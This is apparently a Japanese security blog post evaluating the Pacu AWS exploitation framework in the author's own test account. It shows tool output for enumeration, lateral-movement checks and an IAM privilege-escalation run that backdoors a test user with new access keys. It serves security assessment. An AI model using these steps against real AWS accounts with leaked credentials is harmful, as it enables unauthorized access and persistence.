セキュリティあれこれ

セキュリティ関連のメモ

AWS エクスプロイトフレームワークの PACU を試してみた

AWS エクスプロイトフレームワーク の PACU をプラットフォーム診断で利用できないか検証したのでメモです。

結論

プラットフォーム診断とは用途が異なり利用するのは難しいと思いました。

理由

漏洩した IAM アカウントのアクセスキーやシークレットアクセスキーが存在していた場合、どういった攻撃可能性があるのかをペネトレーションテスト観点で調査するのには便利ですが、漏洩前提となるのでプラットフォーム診断に取り入れるメリットは少ないと感じました。

特定アカウントの IAM アカウント権限でどこまでできるかといった調査も可能ですが、IAM アカウント付与されてる従業員のアクセスキーとシークレットアクセスキーを利用する必要があるので現実的ではありません。

検証環境

今回、Kali Linux に PACU をインストールして試しました。

インストール方法やコマンドオプション等はこちらを参照ください。
github.com

モジュールの一覧はこちらを参照ください。
github.com

検証内容

pacu の起動

pacu コマンドで CLI を起動します。

$ pacu
 ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
 ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣤⣶⣿⣿⣿⣿⣿⣿⣶⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
 ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣾⣿⡿⠛⠉⠁⠀⠀⠈⠙⠻⣿⣿⣦⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
 ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠛⠛⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠻⣿⣷⣀⣀⣀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀
 ⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣤⣤⣤⣤⣤⣤⣤⣤⣀⣀⠀⠀⠀⠀⠀⠀⢻⣿⣿⣿⡿⣿⣿⣷⣦⠀⠀⠀⠀⠀⠀⠀
 ⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣀⣀⣈⣉⣙⣛⣿⣿⣿⣿⣿⣿⣿⣿⡟⠛⠿⢿⣿⣷⣦⣄⠀⠀⠈⠛⠋⠀⠀⠀⠈⠻⣿⣷⠀⠀⠀⠀⠀⠀
 ⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣀⣈⣉⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣧⣀⣀⣀⣤⣿⣿⣿⣷⣦⡀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣆⠀⠀⠀⠀⠀
 ⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣬⣭⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠿⠛⢛⣉⣉⣡⣄⠀⠀⠀⠀⠀⠀⠀⠀⠻⢿⣿⣿⣶⣄⠀⠀
 ⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠟⠋⣁⣤⣶⡿⣿⣿⠉⠻⠏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⢻⣿⣧⡀
 ⠀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠟⠋⣠⣶⣿⡟⠻⣿⠃⠈⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢹⣿⣧
 ⢀⣀⣤⣴⣶⣶⣶⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠟⠁⢠⣾⣿⠉⠻⠇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿
 ⠉⠛⠿⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠁⠀⠀⠀⠀⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⣿⡟
 ⠀⠀⠀⠀⠉⣻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣾⣿⡟⠁
 ⠀⠀⠀⢀⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣦⣄⡀⠀⠀⠀⠀⠀⣴⣆⢀⣴⣆⠀⣼⣆⠀⠀⣶⣶⣶⣶⣶⣶⣶⣶⣾⣿⣿⠿⠋⠀⠀
 ⠀⠀⠀⣼⣿⣿⣿⠿⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠓⠒⠒⠚⠛⠛⠛⠛⠛⠛⠛⠛⠀⠀⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠀⠀⠀⠀⠀
 ⠀⠀⠀⣿⣿⠟⠁⠀⢸⣿⣿⣿⣿⣿⣿⣿⣶⡀⠀⢠⣾⣿⣿⣿⣿⣿⣿⣷⡄⠀⢀⣾⣿⣿⣿⣿⣿⣿⣷⣆⠀⢰⣿⣿⣿⠀⠀⠀⣿⣿⣿
 ⠀⠀⠀⠘⠁⠀⠀⠀⢸⣿⣿⡿⠛⠛⢻⣿⣿⡇⠀⢸⣿⣿⡿⠛⠛⢿⣿⣿⡇⠀⢸⣿⣿⡿⠛⠛⢻⣿⣿⣿⠀⢸⣿⣿⣿⠀⠀⠀⣿⣿⣿
 ⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡇⠀⠀⢸⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⢸⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⠸⠿⠿⠟⠀⢸⣿⣿⣿⠀⠀⠀⣿⣿⣿
 ⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡇⠀⠀⢸⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⢸⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⠀⠀⠀⣿⣿⣿
 ⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣧⣤⣤⣼⣿⣿⡇⠀⢸⣿⣿⣧⣤⣤⣼⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⠀⠀⠀⣿⣿⣿
 ⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⡿⠃⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⢀⣀⣀⣀⠀⢸⣿⣿⣿⠀⠀⠀⣿⣿⣿
 ⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡏⠉⠉⠉⠉⠀⠀⠀⢸⣿⣿⡏⠉⠉⢹⣿⣿⡇⠀⢸⣿⣿⣇⣀⣀⣸⣿⣿⣿⠀⢸⣿⣿⣿⣀⣀⣀⣿⣿⣿
 ⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡇⠀⠀⢸⣿⣿⡇⠀⠸⣿⣿⣿⣿⣿⣿⣿⣿⡿⠀⠀⢿⣿⣿⣿⣿⣿⣿⣿⡟
 ⠀⠀⠀⠀⠀⠀⠀⠀⠘⠛⠛⠃⠀⠀⠀⠀⠀⠀⠀⠘⠛⠛⠃⠀⠀⠘⠛⠛⠃⠀⠀⠉⠛⠛⠛⠛⠛⠛⠋⠀⠀⠀⠀⠙⠛⠛⠛⠛⠛⠉⠀

新しくセッションを作成する場合は 0 を選択します。下記の場合だと pacu という新しいセッションを作成しています。

Found existing sessions:
  [0] New session
  [1] test
Choose an option: 0
What would you like to name this new session? pacu
Session pacu created.

前回のセッションを利用する場合は、そのセッション番号を入力します。下記の場合だと 1 を選択して pacu というセッションを選択しています。

Found existing sessions:
  [0] New session
  [1] pacu
Choose an option: 1

セッションの削除

delete_session コマンドでセッションを削除できます。下記の場合だと 0 を選択して pacu というセッションを削除しています。

Pacu (test:test) > delete_session
Delete which session?
  [0] pacu
  [1] test (ACTIVE)
Choose an option: 0
Deleted pacu from the database!
Note that the output folder at ~/.local/share/pacu/sessions/pacu/ will not be deleted. Do it manually if necessary.
Pacu (test:test) >

コマンドオプションの一覧表示

help コマンドでコマンドオプションを表示できます。

Pacu (test:test) > help

    Pacu - https://github.com/RhinoSecurityLabs/pacu
    Written and researched by Spencer Gietzen of Rhino Security Labs - https://rhinosecuritylabs.com/

    This was built as a modular, open source tool to assist in penetration testing an AWS environment.
    For usage and developer documentation, please visit the GitHub page.

    Modules that have pre-requisites will have those listed in that modules help info, but if it is
    executed before its pre-reqs have been filled, it will prompt you to run that module then continue
    once that is finished, so you have the necessary data for the module you want to run.

    Pacu command info:
        list/ls                             List all modules
        load_commands_file <file>           Load an existing file with list of commands to execute
        search [cat[egory]] <search term>   Search the list of available modules by name or category
        help                                Display this page of information
        help <module name>                  Display information about a module
        whoami                              Display information regarding to the active access keys
        data                                Display all data that is stored in this session. Only fields
                                              with values will be displayed
        data <service>                      Display all data for a specified service in this session
        services                            Display a list of services that have collected data in the
                                              current session to use with the "data" command
        regions                             Display a list of all valid AWS regions
        update_regions                      Run a script to update the regions database to the newest
                                              version
        set_regions <region> [<region>...]  Set the default regions for this session. These space-separated
                                              regions will be used for modules where regions are required,
                                              but not supplied by the user. The default set of regions is
                                              every supported region for the service. Supply "all" to this
                                              command to reset the region set to the default of all
                                              supported regions
        run/exec <module name>              Execute a module
        set_keys                            Add a set of AWS keys to the session and set them as the
                                              default
        swap_keys                           Change the currently active AWS key to another key that has
                                              previously been set for this session
        import_keys <profile name>|--all    Import AWS keys from the AWS CLI credentials file (located
                                              at ~/.aws/credentials) to the current sessions database.
                                              Enter the name of a profile you would like to import or
                                              supply --all to import all the credentials in the file.
        assume_role <role arn>              Call AssumeRole on the specified role from the current
                                              credentials, add the resulting temporary keys to the Pacu
                                              key database and start using these new credentials.
        export_keys                         Export the active credentials to a profile in the AWS CLI
                                              credentials file (~/.aws/credentials)
        sessions/list_sessions              List all sessions in the Pacu database
        swap_session                        Change the active Pacu session to another one in the database
        delete_session                      Delete a Pacu session from the database. Note that the output
                                              folder for that session will not be deleted

        exit/quit                           Exit Pacu

    Other command info:
        aws <command>                       Run an AWS CLI command directly. Note: If Pacu detects "aws"
                                              as the first word of the command, the whole command will
                                              instead be run in a shell so that you can use the AWS CLI
                                              from within Pacu. Due to the command running in a shell,
                                              this enables you to pipe output where needed. An example
                                              would be to run an AWS CLI command and pipe it into "jq"
                                              to parse the data returned. Warning: The AWS CLI's
                                              authentication is not related to Pacu. Be careful to
                                              ensure that you are using the keys you want when using
                                              the AWS CLI. It is suggested to use AWS CLI profiles
                                              to solve this problem
        console/open_console                Generate a URL that will log the current user/role in to
                                              the AWS web console

IAM アカウントの登録

set_keys コマンドでアクセスキーとシークレットアクセスキーを登録します。

Pacu (pacu:No Keys Set) > set_keys 
Setting AWS Keys...
Press enter to keep the value currently stored.
Enter the letter C to clear the value, rather than set it.
If you enter an existing key_alias, that key's fields will be updated instead of added.

Key alias [None]: pacu
Access key ID [None]: XXXXXX
Secret access key [None]: XXXXXX
Session token (Optional - for temp AWS keys only) [None]: 

Keys saved to database.

モジュール一覧の表示

ls コマンドでモジュール一覧を表示できます。

Pacu (test:test) > ls

[Category: ESCALATE]

  iam__privesc_scan
  cfn__resource_injection

[Category: RECON_UNAUTH]

  iam__enum_users
  iam__enum_roles

[Category: EVADE]

  guardduty__whitelist_ip
  cloudtrail__download_event_history
  cloudwatch__download_logs
  detection__enum_services
  waf__enum
  elb__enum_logging
  detection__disruption

[Category: EXFIL]

  s3__download_bucket
  rds__explore_snapshots
  ebs__download_snapshots

[Category: LATERAL_MOVE]

  vpc__enum_lateral_movement
  cloudtrail__csv_injection

[Category: EXPLOIT]

  ec2__startup_shell_script
  lightsail__generate_temp_access
  systemsmanager__rce_ec2
  api_gateway__create_api_keys
  ecs__backdoor_task_def
  lightsail__generate_ssh_keys
  ebs__explore_snapshots
  lightsail__download_ssh_keys

[Category: ENUM]

  ec2__enum
  acm__enum
  apigateway__enum
  iam__enum_permissions
  lightsail__enum
  codebuild__enum
  guardduty__list_findings
  iam__enum_users_roles_policies_groups
  aws__enum_spend
  iam__get_credential_report
  inspector__get_reports
  iam__detect_honeytokens
  cloudformation__download_data
  glue__enum
  ebs__enum_volumes_snapshots
  lambda__enum
  systemsmanager__download_parameters
  dynamodb__enum
  enum__secrets
  ecr__enum
  rds__enum
  guardduty__list_accounts
  ecs__enum
  aws__enum_account
  ecs__enum_task_def
  route53__enum
  ec2__download_userdata
  ec2__check_termination_protection
  iam__bruteforce_permissions

[Category: PERSIST]

  ec2__backdoor_ec2_sec_groups
  lambda__backdoor_new_users
  lambda__backdoor_new_sec_groups
  lambda__backdoor_new_roles
  iam__backdoor_users_keys
  iam__backdoor_users_password
  iam__backdoor_assume_role

codebuild__enum

codebuild にパスワードや API キーなどの機密情報が存在しないかスキャンできます。

codebuild__enum のコマンドオプションは下記となります。

Pacu (pacu:pacu) > help codebuild__enum

codebuild__enum written by Spencer Gietzen of Rhino Security Labs.

usage: pacu [--regions REGIONS] [--builds] [--projects]

This module enumerates all CodeBuild builds and projects, with the goal of finding sensitive information in the
environment variables associated with each one, like passwords, secrets, or API keys.

optional arguments:
  --regions REGIONS  One or more (comma separated) AWS regions in the format "us-east-1". Defaults to all session
                     regions.
  --builds           Enumerate builds. If this is passed in without --projects, then only builds will be
                     enumerated. By default, both are enumerated.
  --projects         Enumerate projects. If this is passed in without --builds, then only projects will be
                     enumerated. By default, both are enumerated.

codebuild を利用していないので特にスキャン結果から有益な情報は表示されていません。

Pacu (pacu:pacu) > run codebuild__enum
  Running module codebuild__enum...
Automatically targeting regions:
  ap-northeast-1
  ap-northeast-2
  ap-northeast-3
  ap-south-1
  ap-southeast-1
  ap-southeast-2
  ca-central-1
  eu-central-1
  eu-north-1
  eu-west-1
  eu-west-2
  eu-west-3
  sa-east-1
  us-east-1
  us-east-2
  us-west-1
  us-west-2
Continue? (y/n) y
[codebuild__enum] Starting region ap-northeast-1...
[codebuild__enum] Starting region ap-northeast-2...
[codebuild__enum] Starting region ap-south-1...
[codebuild__enum] Starting region ap-southeast-1...
[codebuild__enum] Starting region ap-southeast-2...
[codebuild__enum] Starting region ca-central-1...
[codebuild__enum] Starting region eu-central-1...
[codebuild__enum] Starting region eu-north-1...
[codebuild__enum] Starting region eu-west-1...
[codebuild__enum] Starting region eu-west-2...
[codebuild__enum] Starting region eu-west-3...
[codebuild__enum] Starting region sa-east-1...
[codebuild__enum] Starting region us-east-1...
[codebuild__enum] Starting region us-east-2...
[codebuild__enum] Starting region us-west-1...
[codebuild__enum] Starting region us-west-2...
[codebuild__enum] codebuild__enum completed.

[codebuild__enum] MODULE SUMMARY:

    All
        0 EnvironmentVariable(s) found.

vpc__enum_lateral_movement

VPNVPC Peering を利用して他ネットワークへの接続可能をチェックできます。

vpc__enum_lateral_movement のコマンドオプションは下記となります。

Pacu (pacu:pacu) > help vpc__enum_lateral_movement

vpc__enum_lateral_movement written by Chris Farris <chris@room17.com>.

usage: pacu [--versions-all]

Looks for DirectConnect, VPN or VPC Peering to understand where you can go once you compromise an instance inside a
VPC.

optional arguments:
  --versions-all  Grab all versions instead of just the latest

VPNVPC Peering を利用していないので特にスキャン結果から有益な情報は表示されていません。

Pacu (pacu:pacu) > run vpc__enum_lateral_movement
  Running module vpc__enum_lateral_movement...
[vpc__enum_lateral_movement] Starting region ap-northeast-1...
[vpc__enum_lateral_movement]   Enumerating DirectConnect
[vpc__enum_lateral_movement]   Enumerating VPNs
[vpc__enum_lateral_movement]   Enumerating Peering
[vpc__enum_lateral_movement] Starting region ap-northeast-2...
[vpc__enum_lateral_movement]   Enumerating DirectConnect
[vpc__enum_lateral_movement]   Enumerating VPNs
[vpc__enum_lateral_movement]   Enumerating Peering
[vpc__enum_lateral_movement] Starting region ap-northeast-3...
[vpc__enum_lateral_movement]   Enumerating DirectConnect
[vpc__enum_lateral_movement]   Enumerating VPNs
[vpc__enum_lateral_movement]   Enumerating Peering
[vpc__enum_lateral_movement] Starting region ap-south-1...
[vpc__enum_lateral_movement]   Enumerating DirectConnect
[vpc__enum_lateral_movement]   Enumerating VPNs
[vpc__enum_lateral_movement]   Enumerating Peering
[vpc__enum_lateral_movement] Starting region ap-southeast-1...
[vpc__enum_lateral_movement]   Enumerating DirectConnect
[vpc__enum_lateral_movement]   Enumerating VPNs
[vpc__enum_lateral_movement]   Enumerating Peering
[vpc__enum_lateral_movement] Starting region ap-southeast-2...
[vpc__enum_lateral_movement]   Enumerating DirectConnect
[vpc__enum_lateral_movement]   Enumerating VPNs
[vpc__enum_lateral_movement]   Enumerating Peering
[vpc__enum_lateral_movement] Starting region ca-central-1...
[vpc__enum_lateral_movement]   Enumerating DirectConnect
[vpc__enum_lateral_movement]   Enumerating VPNs
[vpc__enum_lateral_movement]   Enumerating Peering
[vpc__enum_lateral_movement] Starting region eu-central-1...
[vpc__enum_lateral_movement]   Enumerating DirectConnect
[vpc__enum_lateral_movement]   Enumerating VPNs
[vpc__enum_lateral_movement]   Enumerating Peering
[vpc__enum_lateral_movement] Starting region eu-north-1...
[vpc__enum_lateral_movement]   Enumerating DirectConnect
[vpc__enum_lateral_movement]   Enumerating VPNs
[vpc__enum_lateral_movement]   Enumerating Peering
[vpc__enum_lateral_movement] Starting region eu-west-1...
[vpc__enum_lateral_movement]   Enumerating DirectConnect
[vpc__enum_lateral_movement]   Enumerating VPNs
[vpc__enum_lateral_movement]   Enumerating Peering
[vpc__enum_lateral_movement] Starting region eu-west-2...
[vpc__enum_lateral_movement]   Enumerating DirectConnect
[vpc__enum_lateral_movement]   Enumerating VPNs
[vpc__enum_lateral_movement]   Enumerating Peering
[vpc__enum_lateral_movement] Starting region eu-west-3...
[vpc__enum_lateral_movement]   Enumerating DirectConnect
[vpc__enum_lateral_movement]   Enumerating VPNs
[vpc__enum_lateral_movement]   Enumerating Peering
[vpc__enum_lateral_movement] Starting region sa-east-1...
[vpc__enum_lateral_movement]   Enumerating DirectConnect
[vpc__enum_lateral_movement]   Enumerating VPNs
[vpc__enum_lateral_movement]   Enumerating Peering
[vpc__enum_lateral_movement] Starting region us-east-1...
[vpc__enum_lateral_movement]   Enumerating DirectConnect
[vpc__enum_lateral_movement]   Enumerating VPNs
[vpc__enum_lateral_movement]   Enumerating Peering
[vpc__enum_lateral_movement] Starting region us-east-2...
[vpc__enum_lateral_movement]   Enumerating DirectConnect
[vpc__enum_lateral_movement]   Enumerating VPNs
[vpc__enum_lateral_movement]   Enumerating Peering
[vpc__enum_lateral_movement] Starting region us-west-1...
[vpc__enum_lateral_movement]   Enumerating DirectConnect
[vpc__enum_lateral_movement]   Enumerating VPNs
[vpc__enum_lateral_movement]   Enumerating Peering
[vpc__enum_lateral_movement] Starting region us-west-2...
[vpc__enum_lateral_movement]   Enumerating DirectConnect
[vpc__enum_lateral_movement]   Enumerating VPNs
[vpc__enum_lateral_movement]   Enumerating Peering
[vpc__enum_lateral_movement] vpc__enum_lateral_movement completed.

[vpc__enum_lateral_movement] MODULE SUMMARY:

  0 Direct Connect Gateways found.
  0 VPNs found.
  0 Peering Connections found.
  0 new VPCs were found.
  2 VPCs are now known.

iam__privesc_scan

IAM アカウント権限でどういったことができるかスキャンします。

iam__privesc_scan のコマンドオプションは下記となります。

Pacu (pacu:pacu) > help iam__privesc_scan

iam__privesc_scan written by Spencer Gietzen of Rhino Security Labs.

Prerequisite Module(s): ['iam__enum_permissions', 'iam__enum_users_roles_policies_groups', 'iam__backdoor_users_keys', 'iam__backdoor_users_password', 'iam__backdoor_assume_role', 'glue__enum', 'lambda__enum']

usage: pacu [--offline] [--folder FOLDER] [--scan-only]

This module will scan for permission misconfigurations to see where privilege escalation will be possible.
Available attack paths will be presented to the user and executed on if chosen. Warning: Due to the implementation
in IAM policies, this module has a difficult time parsing "NotActions". If your user has any NotActions associated
with them, it is recommended to manually verify the results of this module. NotActions are noted with a "!"
preceeding the action when viewing the results of the "whoami" command. For more information on what NotActions
are, visit the following link:
https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_elements_notaction.html

optional arguments:
  --offline        By passing this argument, this module will not make an API calls. If offline mode is enabled,
                   you need to pass a file path to a folder that contains JSON files of the different users,
                   policies, groups, and/or roles in the account using the --folder argument. This module will
                   scan those JSON policy files to identify users, groups, and roles that have overly permissive
                   policies.
  --folder FOLDER  A file path pointing to a folder full of JSON files containing policies and connections between
                   users, groups, and/or roles in an AWS account. The module "iam__enum_permissions" with the "--
                   all-users" flag outputs the exact format required for this feature to
                   ~/.local/share/pacu/sessions/[current_session_name]/downloads/confirmed_permissions/.
  --scan-only      Only run the scan to check for possible escalation methods, don't attempt any found methods.

--scan-only オプションを付けるとスキャンのみ実行します。iam__enum_permissions も実行されます。

Pacu (pacu:pacu) > run iam__privesc_scan --scan-only
  Running module iam__privesc_scan...
[iam__privesc_scan] No permissions detected yet.
[iam__privesc_scan] Data (Current User/Role > Permissions) not found, run module "iam__enum_permissions" to fetch it? (y/n) y
[iam__privesc_scan]   Running module iam__enum_permissions...
[iam__enum_permissions] Confirming permissions for users:
[iam__enum_permissions]   pacu...
[iam__enum_permissions]     Confirmed Permissions for pacu
[iam__enum_permissions] iam__enum_permissions completed.

[iam__enum_permissions] MODULE SUMMARY:

  Confirmed permissions for user: pacu.
  Confirmed permissions for 0 role(s).

[iam__privesc_scan] Escalation methods for current user:
[iam__privesc_scan]   CONFIRMED: CreateNewPolicyVersion
[iam__privesc_scan]   CONFIRMED: SetExistingDefaultPolicyVersion
[iam__privesc_scan]   CONFIRMED: CreateAccessKey
[iam__privesc_scan]   CONFIRMED: CreateLoginProfile
[iam__privesc_scan]   CONFIRMED: UpdateLoginProfile
[iam__privesc_scan]   CONFIRMED: AttachUserPolicy
[iam__privesc_scan]   CONFIRMED: AttachGroupPolicy
[iam__privesc_scan]   CONFIRMED: PutUserPolicy
[iam__privesc_scan]   CONFIRMED: PutGroupPolicy
[iam__privesc_scan]   CONFIRMED: AddUserToGroup

[iam__privesc_scan] iam__privesc_scan completed.

[iam__privesc_scan] MODULE SUMMARY:

  Scan Complete

下記は IAM アカウント(test)に新たにアクセスキーとシークレットアクセスキーを発行しています。iam__enum_users_roles_policies_groups も実行されます。

Pacu (pacu:pacu) > run iam__privesc_scan
  Running module iam__privesc_scan...
[iam__privesc_scan] Escalation methods for current user:
[iam__privesc_scan]   CONFIRMED: CreateNewPolicyVersion
[iam__privesc_scan]   CONFIRMED: SetExistingDefaultPolicyVersion
[iam__privesc_scan]   CONFIRMED: CreateAccessKey
[iam__privesc_scan]   CONFIRMED: CreateLoginProfile
[iam__privesc_scan]   CONFIRMED: UpdateLoginProfile
[iam__privesc_scan]   CONFIRMED: AttachUserPolicy
[iam__privesc_scan]   CONFIRMED: AttachGroupPolicy
[iam__privesc_scan]   CONFIRMED: PutUserPolicy
[iam__privesc_scan]   CONFIRMED: PutGroupPolicy
[iam__privesc_scan]   CONFIRMED: AddUserToGroup
[iam__privesc_scan] Attempting confirmed privilege escalation methods...

[iam__privesc_scan]   Starting method CreateNewPolicyVersion...

[iam__privesc_scan]     Is there a specific policy you want to target? Enter its ARN now (just hit enter to automatically figure out a valid policy to target): 
[iam__privesc_scan]     No policy ARN entered, now finding a valid policy...

[iam__privesc_scan]       0 valid group-attached policy(ies) found.

[iam__privesc_scan]       No valid group-attached policies found.
[iam__privesc_scan]     It looks like the current users confirmed permissions have not been enumerated yet, so no valid policy can be found, enter "y" to run the iam__enum_permissions module to enumerate the required information, enter the ARN of a policy to create a new version for, or "n" to skip this privilege escalation module ([policy_arn]/y/n): 
[iam__privesc_scan]   All methods of enumerating a valid policy have failed. Manually enter in a policy ARN to use, or press enter to skip to the next privilege escalation method: 
[iam__privesc_scan]   Method failed. Trying next potential method...
[iam__privesc_scan]   Starting method SetExistingDefaultPolicyVersion...

[iam__privesc_scan]     Is there a specific policy you want to target? Enter its ARN now (just hit enter to automatically figure out a list of valid policies to check): 
[iam__privesc_scan]     No policy ARN entered, now finding a valid policy...

[iam__privesc_scan]   All methods of enumerating a valid policy have failed. Skipping to the next privilege escalation method...

[iam__privesc_scan]   Method failed. Trying next potential method...
[iam__privesc_scan]   Starting method CreateAccessKey...

[iam__privesc_scan]     Is there a specific user you want to target? They must not already have two sets of access keys created for their user. Enter their user name now or just hit enter to enumerate users and view a list of options: 
[iam__privesc_scan] Data (IAM > Users) not found, run module "iam__enum_users_roles_policies_groups" to fetch it? (y/n) y
[iam__privesc_scan]   Running module iam__enum_users_roles_policies_groups...
[iam__enum_users_roles_policies_groups] Found 2 users
[iam__enum_users_roles_policies_groups] iam__enum_users_roles_policies_groups completed.

[iam__enum_users_roles_policies_groups] MODULE SUMMARY:

  2 Users Enumerated
  IAM resources saved in Pacu database.

[iam__privesc_scan] Found 2 user(s). Choose a user below.
[iam__privesc_scan]   [0] Other (Manually enter user name)
[iam__privesc_scan]   [1] pacu
[iam__privesc_scan]   [2] test
[iam__privesc_scan] Choose an option: 2
[iam__privesc_scan]   Running module iam__backdoor_users_keys...
[iam__backdoor_users_keys] Backdoor the following users?
[iam__backdoor_users_keys]   test
[iam__backdoor_users_keys]     Access Key ID: XXXXXX
[iam__backdoor_users_keys]     Secret Key: XXXXXX
[iam__backdoor_users_keys] iam__backdoor_users_keys completed.

[iam__backdoor_users_keys] MODULE SUMMARY:

  1 user key(s) successfully backdoored.


[iam__privesc_scan] iam__privesc_scan completed.

[iam__privesc_scan] MODULE SUMMARY:

  Privilege escalation was successful

実際に AWS コンソールで確認してみると test アカウントに新たにアクセスキーとシークレットアクセスキーが追加されていることがわかります。

f:id:yokoyama0721:20220228174554p:plain